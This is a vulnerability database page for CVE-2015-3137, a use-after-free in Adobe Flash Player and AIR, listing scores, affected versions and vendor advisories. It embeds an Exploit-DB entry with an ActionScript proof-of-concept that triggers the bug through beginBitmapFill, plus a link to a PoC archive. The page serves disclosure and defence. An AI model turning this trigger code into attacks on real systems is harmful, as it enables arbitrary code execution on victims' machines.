CVE-2015-3137 : Detail

CVE-2015-3137

67.6%V3
Network
2015-07-09
14h00 +00:00
2017-09-21
07h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Use-after-free vulnerability in Adobe Flash Player before 13.0.0.302 and 14.x through 18.x before 18.0.0.203 on Windows and OS X and before 11.2.202.481 on Linux, Adobe AIR before 18.0.0.180, Adobe AIR SDK before 18.0.0.180, and Adobe AIR SDK & Compiler before 18.0.0.180 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-3118, CVE-2015-3124, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-4428, CVE-2015-4430, and CVE-2015-5117.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 37864

Publication date : 2015-08-18 22h00 +00:00
Author : Google Security Research
EDB Verified : Yes

Source: https://code.google.com/p/google-security-research/issues/detail?id=388&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id There are use-after frees realated to storing a single pointer (this this pointer) in several MovieClip drawing methods, including beginFill, beginBitmapFill, beginGradientFill, linGradientStyle, lineTo, moveTo, curveTo and lineStyle. A proof-of-concept involving bitmapFill is bewlo: import flash.display.*; import flash.geom.*; var bmpd:BitmapData = new BitmapData(20,20); var rect1:Rectangle = new Rectangle(0,0,10,10); var rect2:Rectangle = new Rectangle(0, 10, 10, 20); var rect3:Rectangle = new Rectangle(10, 0, 20, 10); var rect4:Rectangle = new Rectangle(10, 10, 20, 20); bmpd.fillRect(rect1, 0xAA0000FF); bmpd.fillRect(rect2, 0xAA00FF00); bmpd.fillRect(rect3, 0xAAFF0000); bmpd.fillRect(rect4, 0xAA999999); var thiz = this; this.createEmptyMovieClip("bmp_fill_mc", 1); with (bmp_fill_mc) { var n = {valueOf: func}; matrix = {a:2, b:n, c:0, d:2, tx:0, ty:0}; //matrix.rotate(Math.PI/8); repeat = true; smoothing = true; beginBitmapFill(bmpd, matrix, repeat, smoothing); moveTo(0, 0); lineTo(0, 60); lineTo(60, 60); lineTo(60, 0); lineTo(0, 0); endFill(); } bmp_fill_mc._xscale = 200; bmp_fill_mc._yscale = 200; function func(){ var test = thiz.createTextField("test", 1, 1, 1, 10, 10); trace(test); test.removeTextField(); return 777; } A sample fla and swf are attached. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37864.zip

Products Mentioned

Configuraton 0

Adobe>>Flash_player >> Version To (including) 13.0.0.289

Adobe>>Flash_player >> Version 14.0.0.125

Adobe>>Flash_player >> Version 14.0.0.145

Adobe>>Flash_player >> Version 14.0.0.176

Adobe>>Flash_player >> Version 14.0.0.179

Adobe>>Flash_player >> Version 15.0.0.152

Adobe>>Flash_player >> Version 15.0.0.167

Adobe>>Flash_player >> Version 15.0.0.189

Adobe>>Flash_player >> Version 15.0.0.223

Adobe>>Flash_player >> Version 15.0.0.239

Adobe>>Flash_player >> Version 15.0.0.246

Adobe>>Flash_player >> Version 16.0.0.235

Adobe>>Flash_player >> Version 16.0.0.257

Adobe>>Flash_player >> Version 16.0.0.287

Adobe>>Flash_player >> Version 16.0.0.296

Adobe>>Flash_player >> Version 17.0.0.134

Adobe>>Flash_player >> Version 17.0.0.169

Adobe>>Flash_player >> Version 17.0.0.188

Adobe>>Flash_player >> Version 17.0.0.190

Adobe>>Flash_player >> Version 18.0.0.160

Adobe>>Flash_player >> Version 18.0.0.194

Apple>>Mac_os_x >> Version -

Microsoft>>Windows >> Version -

Configuraton 0

Adobe>>Air >> Version To (including) 18.0.0.144

Adobe>>Air_sdk >> Version To (including) 18.0.0.144

Adobe>>Air_sdk_\&_compiler >> Version To (including) 18.0.0.144

Configuraton 0

Adobe>>Flash_player >> Version To (including) 11.2.202.468

Linux>>Linux_kernel >> Version -

References

http://www.securitytracker.com/id/1032810
Tags : vdb-entry, x_refsource_SECTRACK
http://rhn.redhat.com/errata/RHSA-2015-1214.html
Tags : vendor-advisory, x_refsource_REDHAT
https://security.gentoo.org/glsa/201507-13
Tags : vendor-advisory, x_refsource_GENTOO
http://www.securityfocus.com/bid/75590
Tags : vdb-entry, x_refsource_BID